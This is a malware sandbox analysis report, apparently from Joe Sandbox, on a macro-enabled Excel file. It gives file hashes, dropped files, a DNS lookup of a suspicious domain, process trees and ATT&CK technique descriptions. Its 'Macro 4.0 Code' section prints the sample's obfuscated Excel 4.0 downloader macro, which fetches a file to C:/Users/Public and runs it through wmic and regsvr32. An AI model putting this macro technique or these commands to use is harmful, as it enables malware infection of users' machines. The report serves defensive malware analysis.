MD5:	55E8A29B221E51BE421B7D4F5F5F7E52
SHA1:	117E73181FC9CDAA0904C6372D68EE48CEDC14E4
SHA-256:	B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8
SHA-512:	8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x...JIDATHKc...?...g..l.;k...FF...@H..jb`d..?-P'.SYA......f.........'.?............{K.a..:..W..s.~.....{.....<.....9.......[.=\{.._FN^._{'{3VM?.p..v._....v..;..s...O......\|........yaz....!/...........o..xZ.Sn...O+YP.122.....33.A..3.?.DR...+.F...o.M_..h.W...}..K?.............z..K...........F?..{............\|..`!lX...E.....$.......3... ..0....+.r.D.D7e.&.b...t...../..o.I2.p...yl.J\|.Y0j4Z....!.s#;.XW.gbd`.bb........X..ue...'fi..[1..!.@.......s.:(..e`}.. ...-...1.. J..(`..,}.X...H.>".m?..h .X.D.5Ff......y"4.P.4d...@.A..8.[?..7q....I..M..[.>\{....j..Y3...3.5'......op.....IEND.B`.

C:\Users\user\AppData\Local\Temp\D2CE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	279279
Entropy (8bit):	7.646925449721352
Encrypted:	false
SSDEEP:	6144:5QUOipLbVxhmafLtkjY9s0npbXPygvjRNpd5uMDyi:5QUOipLbVxhmafLtkjY9s0npbXPyHMJ
MD5:	BD358272AF7DAB33151195FF12D6217E
SHA1:	CCC193B27AA91319B42770E4B668FAF7A7929DB6
SHA-256:	08463109BCBBC2A7F8683207172DA2DE3A8473E8D4CBE39AB1744CE83D8E6012
SHA-512:	0B5526CFFD77109335AC74E77475A78B4A8DCF9AC7B35A67F46115F71A81A7A8C1FAC06261C04B97ED6112608F12ADD4F7D39BC5C20B4A5E4324FAF535E1BD8E
Malicious:	false
Reputation:	low
Preview:	..Mn.0....z...B..EQ...h.e. ..hr,...8..}...6.-.h7.%j.........2..Zq..D.AGcC._...WQ!.`...Z.........Xqu.V.D..{.... ..*f..os'..k..<.}.:..@5.......zrT.l......Q}.WP.P)9...Q.........`.~.,.`.....]..eb~."...y..Bw..x..OWdpxT2as.C..V...?qXg.e.\|.......5P.Lw.sZr..K..e..f\........5^..o.Z:.5e..3......p.....z.S6t)..Y.?&.............[.d&.H[...L.Qo.b':E.U..@.@..7......K. ...=.......}..y`e.<..^/.ub!.d...z.@.1r9.h.B..........7.......PK..........!..j0.............[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Apr 7 08:09:35 2021, atime=Wed Apr 7 08:09:35 2021, length=8192, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.478553609647248
Encrypted:	false
SSDEEP:	12:85QQncLgXg/XAlCPCHaXgzB8IB/4UKX+WnicvbPbDtZ3YilMMEpxRljKzTdJP9TK:85dnK/XTwz6IMYe/Dv3q6rNru/
MD5:	835340709C9BFF9A87235BAEB59683B1
SHA1:	0754C627E8564659FE9FB5373FDC2F130EE5CB5E
SHA-256:	0368C23B6D83D9BCEC16378A4E104A8CC2AFD0DA0CF5CFC78751943FC89C133D
SHA-512:	CF31D804EA36B6AC64631F6C19BE45E8C03C684D3669BD76CAEE55CA489C8B77EC5B74ACD688C4868521097DD61BA8F177B7C9E8F770DE4854E63CA8161751A1
Malicious:	false
Preview:	L..................F...........7G.......+.......+... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......R2I..Desktop.d......QK.X.R2I..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\048707\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......048707..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Documents (252).LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Apr 7 08:09:35 2021, atime=Wed Apr 7 08:09:35 2021, length=279279, window=hide
Category:	dropped
Size (bytes):	4176
Entropy (8bit):	4.564390408570414
Encrypted:	false
SSDEEP:	96:8i/XLInkAm6Qh2i/XLInkAm6Qh2i/XLInkAm6Qh2i/XLInkAm6Q/:8wInkArQEwInkArQEwInkArQEwInkArg
MD5:	B2ACE93FE976A321BFC3FD8E59A2B6A6
SHA1:	93F2EB6AC0E1675C80834266AEB0FE694415CB66
SHA-256:	22FEDE4E594CE2465437BAA9E7604556671CE3F8C4AC95C1B9272072A9543952
SHA-512:	942CC4B55B31C338514ACBBD19F1103C8DA9333B2BB33155C4BA1BF179A4B271BB3DDCD8EB062B9F203806C3210943385FD854847FED39EEA71BDDA2A8A81155
Malicious:	false
Preview:	L..................F.... ........{.......+..#....+...B...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....r.2..5...R/I .DOCUME~1.XLS..V.......Q.y.Q.y...8.....................D.o.c.u.m.e.n.t.s. .(.2.5.2.)...x.l.s.m.......~...............-...8...[............?J......C:\Users\..#...................\\048707\Users.user\Desktop\Documents (252).xlsm.+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.o.c.u.m.e.n.t.s. .(.2.5.2.)...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......048707..........D_....3N...W...9F.C....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	208
Entropy (8bit):	4.621699231260284
Encrypted:	false
SSDEEP:	6:dj/HXPiSGXPPHXPiSGXPPHXPiSGXPPHXPC:dTHFG3HFG3HFG3HK
MD5:	EBF0A100F3CDA68735AABF46F42CEFEF
SHA1:	48CA8B0E2DD6FE5737EFA9DAA2F9BB055B72F9E0
SHA-256:	F86272101EB9CA0D4BB98DE814ADAAB3FF2891930B18A20BDDD8CDE3B55AF55B
SHA-512:	C5CBA2A91FEBBAB5B2CB86901F9D8BB50DD720175CDFF25104F37D448B0B6CA43CD9D1F4D5068E7AFB4B9AD564A863EE4914E9ECB9EAF29CC2858DF55CC295A2
Malicious:	false
Preview:	Desktop.LNK=0..[misc]..Documents (252).LNK=0..Documents (252).LNK=0..[misc]..Documents (252).LNK=0..Documents (252).LNK=0..[misc]..Documents (252).LNK=0..Documents (252).LNK=0..[misc]..Documents (252).LNK=0..

C:\Users\user\Desktop\A3CE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	279279
Entropy (8bit):	7.646925449721352
Encrypted:	false
SSDEEP:	6144:5QUOipLbVxhmafLtkjY9s0npbXPygvjRNpd5uMDyi:5QUOipLbVxhmafLtkjY9s0npbXPyHMJ
MD5:	BD358272AF7DAB33151195FF12D6217E
SHA1:	CCC193B27AA91319B42770E4B668FAF7A7929DB6
SHA-256:	08463109BCBBC2A7F8683207172DA2DE3A8473E8D4CBE39AB1744CE83D8E6012
SHA-512:	0B5526CFFD77109335AC74E77475A78B4A8DCF9AC7B35A67F46115F71A81A7A8C1FAC06261C04B97ED6112608F12ADD4F7D39BC5C20B4A5E4324FAF535E1BD8E
Malicious:	false
Preview:	..Mn.0....z...B..EQ...h.e. ..hr,...8..}...6.-.h7.%j.........2..Zq..D.AGcC._...WQ!.`...Z.........Xqu.V.D..{.... ..*f..os'..k..<.}.:..@5.......zrT.l......Q}.WP.P)9...Q.........`.~.,.`.....]..eb~."...y..Bw..x..OWdpxT2as.C..V...?qXg.e.\|.......5P.Lw.sZr..K..e..f\........5^..o.Z:.5e..3......p.....z.S6t)..Y.?&.............[.d&.H[...L.Qo.b':E.U..@.@..7......K. ...=.......}..y`e.<..^/.ub!.d...z.@.1r9.h.B..........7.......PK..........!..j0.............[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$Documents (252).xlsm Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	495
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fj/FFDJw2fV:vBFFGaFFGaFFGS
MD5:	98D7F9B901C91608CD7EA5509662BBCA
SHA1:	F166635CE572B615A1D80076A1AE8DE9220473CF
SHA-256:	F07A8B18E5B50003C42020241E82DDCCFBE254236AF2678C3CEFA4709100F4FE
SHA-512:	5536FD72C18081A1CFB46EB2E311BB257764C53B293E0D4B90F9C6C5EFB00E5A3A28190A2D04F3EE2819CF8DC7EBA7747DC8E8910C8716ACA7BAED0532142D1C
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General
File type:	Zip archive data, at least v2.0 to extract
Entropy (8bit):	7.557820060670911
TrID:	Excel Microsoft Office Open XML Format document (40004/1) 83.32% ZIP compressed archive (8000/1) 16.66% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
File name:	Documents (252).xlsm
File size:	210308
MD5:	966c13f10fa0b3bfe75da87bca817396
SHA1:	1769db2ec1d019b526e63637a413ceab10d00ff3
SHA256:	963963dd218deb7e041b5a2ccf85a48c12d62bd2bdc248d6636b332f234cba14
SHA512:	e81cd50ab4b16286c51d62baba42170d4403947748d7d3ff4983588f9647b8912aa712fad263e9fd0119be04694d0d4ed8ad68f6d0b9d7b7ce06277e752e46e7
SSDEEP:	1536:0jo+iv69kyln4llllllPtEEEEEEGl464S4A4jJ1rwsYijyKU2p9hYgryA:sLiC97l8Xf1LrDy2iE
File Content Preview:	PK........E.yR................docProps/PK..........!..X..............docProps/app.xml.SAn.1..#q....'%.P.q.Z..@DJ..k.I,<.e.........,...0..?...$..W......l..ee..B...d8.I.V:... w....$.IX%..P..Dr._.`..<..!f(acA.).1.Q...q.c....J$,........\|..&z........u...d.8...

File Icon


Icon Hash:	e4e2aa8aa4bcbcac

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	1

OLE File "Documents (252).xlsm"

Indicators
Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AC19(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AA19(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(AC20,AD20,""JCJ"",AE19,0)",,"=FORMULA.ARRAY(before.1.0.0.sheet!AK20&before.1.0.0.sheet!AK21&before.1.0.0.sheet!AK22&before.1.0.0.sheet!AK23&before.1.0.0.sheet!AK24&before.1.0.0.sheet!AK25&before.1.0.0.sheet!AK26&before.1.0.0.sheet!AK27,AC20)","=FORMULA.ARRAY(before.1.0.0.sheet!AL20&before.1.0.0.sheet!AL21&before.1.0.0.sheet!AL22&before.1.0.0.sheet!AL23&before.1.0.0.sheet!AL24&before.1.0.0.sheet!AL25&before.1.0.0.sheet!AL26&before.1.0.0.sheet!AL27&before.1.0.0.sheet!AL28&before.1.0.0.sheet!AL29&before.1.0.0.sheet!AL30&before.1.0.0.sheet!AL31&before.1.0.0.sheet!AL32&before.1.0.0.sheet!AL33&before.1.0.0.sheet!AL34&before.1.0.0.sheet!AL35,AD20)",C:/Users/Public,/dbhfr.xref,"=FORMULA.ARRAY(""A"",before.1.0.0.sheet!AE20)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""UR""&before.1.0.0.sheet!AN21,before.1.0.0.sheet!AO20&before.1.0.0.sheet!AO21&before.1.0.0.sheet!AO22&before.1.0.0.sheet!AO23&before.1.0.0.sheet!AO24&before.1.0.0.sheet!AO25&before.1.0.0.sheet!AO26&before.1.0.0.sheet!AO27&before.1.0.0.sheet!AO28&before.1.0.0.sheet!AO29&before.1.0.0.sheet!AO30&before.1.0.0.sheet!AO31&before.1.0.0.sheet!AO32&before.1.0.0.sheet!AO33&before.1.0.0.sheet!AO34&before.1.0.0.sheet!AO35&before.1.0.0.sheet!AO36&before.1.0.0.sheet!AE20,AI27,0,A99,before.1.0.0.sheet!AE19&before.1.0.0.sheet!AF19,0,0)",,Kernel32,CreateDirectoryA,A,,,,,,K,C,,,U,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AF28(),,=AD19(),=AG19(),,,=AA17(),,,,e,r,,LMon,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,e,,,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,a,,,D,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,e,t,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,e,,,w,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,3,D,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,JJCCBB,,2,i,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(""wmic.exe ""&"" process call create 'regsvr32 -s ""&AE19&AF19&""'"")",,,,,,r,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,e,,,a,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,c,,,d,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,t,,,T,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,,,F,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,y,,,i,,,,,,,,,,,,,,,,,,,,,,,

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 7, 2021 02:09:48.929415941 CEST	52197	53	192.168.2.22	8.8.8.8
Apr 7, 2021 02:09:48.952637911 CEST	53	52197	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 7, 2021 02:09:48.929415941 CEST	192.168.2.22	8.8.8.8	0x26d4	Standard query (0)	xherzog24pv.xyz	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 7, 2021 02:09:48.952637911 CEST	8.8.8.8	192.168.2.22	0x26d4	Name error (3)	xherzog24pv.xyz	none	none	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2268 Parent PID: 584

General

Start time:	02:09:33
Start date:	07/04/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f550000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: WMIC.exe PID: 2512 Parent PID: 2268

General

Start time:	02:09:38
Start date:	07/04/2021
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref'
Imagebase:	0xff4f0000
File size:	566272 bytes
MD5 hash:	FD902835DEAEF4091799287736F3A028
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: regsvr32.exe PID: 2928 Parent PID: 1220

General

Start time:	02:09:38
Start date:	07/04/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -s C:/Users/Public/dbhfr.xref
Imagebase:	0xffa70000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Documents (252).xlsm

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

System Summary:

Signature Overview

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Documents (252).xlsm"

Indicators

Macro 4.0 Code

Network Behavior

Network Port Distribution

UDP Packets

DNS Queries

DNS Answers

Code Manipulations

Statistics

Behavior

System Behavior

Analysis Process: EXCEL.EXE PID: 2268 Parent PID: 584

General

Analysis Process: WMIC.exe PID: 2512 Parent PID: 2268

General

Analysis Process: regsvr32.exe PID: 2928 Parent PID: 1220

General

Disassembly

Code Analysis